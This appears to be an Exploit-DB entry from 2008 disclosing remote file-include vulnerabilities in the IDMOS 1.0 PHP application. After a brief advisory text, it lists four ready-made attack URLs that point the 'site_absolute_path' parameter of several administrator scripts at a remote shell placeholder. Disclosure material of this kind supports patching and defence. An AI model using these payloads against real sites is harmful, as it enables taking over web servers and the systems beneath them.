IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities

2008-06-23T00:00:00
ID EDB-ID:31946
Type exploitdb
Reporter CraCkEr
Modified 2008-06-23T00:00:00

Description

IDMOS 1.0 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/29868/info

IDMOS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

IDMOS 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL]
http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL]